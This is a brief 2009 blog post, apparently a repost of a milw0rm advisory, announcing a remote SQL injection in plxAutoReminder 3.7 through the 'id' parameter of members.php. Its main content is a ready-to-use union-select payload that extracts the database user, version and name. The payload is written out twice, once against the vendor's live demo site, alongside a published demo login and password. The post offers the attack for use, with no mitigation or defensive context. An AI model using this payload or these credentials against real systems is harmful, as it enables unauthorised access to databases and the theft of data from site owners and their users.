plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability

5 Ocak 2009 Pazartesi

plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability

plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7663



Discovered By: ZoRLu

you must login to site

R-Sql

z0rlu.blogspot.com/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

for demo:

user: trt-turk@hotmail.com

pass: salla1

http://www.plxwebdev.com/demos/autoreminder/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

ZoRLu | ZRL | Buffer Overflow

5 Ocak 2009 Pazartesi

plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com